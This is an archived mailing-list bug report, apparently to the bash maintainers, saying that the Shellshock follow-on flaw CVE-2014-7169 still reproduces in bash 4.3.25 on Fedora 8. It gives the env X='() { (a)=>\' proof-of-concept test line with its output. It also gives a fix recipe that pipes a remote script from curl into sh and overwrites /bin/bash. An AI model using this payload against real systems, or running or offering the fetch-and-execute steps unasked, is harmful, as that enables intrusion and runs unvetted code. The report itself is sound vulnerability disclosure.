[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Exploit 2 (CVE-2014-7169)

From: Brady Cummings
Subject: Exploit 2 (CVE-2014-7169)
Date: Fri, 26 Sep 2014 11:27:27 -0500 (CDT)

Bash Maintainers,

Bash Version      :  GNU bash, version 4.3.25(2)-release (i686-pc-linux-gnu)
OS Version        :  Fedora release 8
Processor         :  Intel Atom D425 1.8GHz Single-core 
RAM               :  1GB
Compilation Flags :  Defaults (compiles fine)

Bug:  Exploit 2 (CVE-2014-7169) still exists 4.3.25(2) version when complied in 
Fedora Core 8. 

Command : bash -version  ||  sh --version 
Results : 
          GNU bash, version 4.3.25(2)-release (i686-pc-linux-gnu)
          Copyright (C) 2013 Free Software Foundation, Inc.
          License GPLv3+: GNU GPL version 3 or later 

          This is free software; you are free to change and redistribute it.
          There is NO WARRANTY, to the extent permitted by law.

Command : env X='() { (a)=>\' bash -c "echo date"; cat echo

Results : 
          bash: X: line 1: syntax error near unexpected token `='
          bash: X: line 1: `'
          bash: error importing function definition for `X'
          Fri Sep 26 11:05:55 CDT 2014

Recipe  : Based on script from https://shellshocker.net/

          curl https://shellshocker.net/fixbash | sh
          cp -f /usr/local/bin/bash /bin/bash
          sh --version
          env X='() { (a)=>\' bash -c "echo date"; cat echo


Brady Cummings
Sr. Software Engineer 
TCS Basys Controls 2800 Laura Lane 
Middleton, WI 53562 
TOLLFREE: 800.288.9383 PH: 608.836.9034 Ext. 9180 FX: 608.836.9044 

Please consider the environment before printing this e-mail 
This message is for the named person's use only. You must not, directly or 
indirectly, use, disclose, distribute, print, or copy any part of this message 
if you are not the intended recipient.  © 2013 Temperature Control Specialties 

reply via email to

[Prev in Thread] Current Thread [Next in Thread]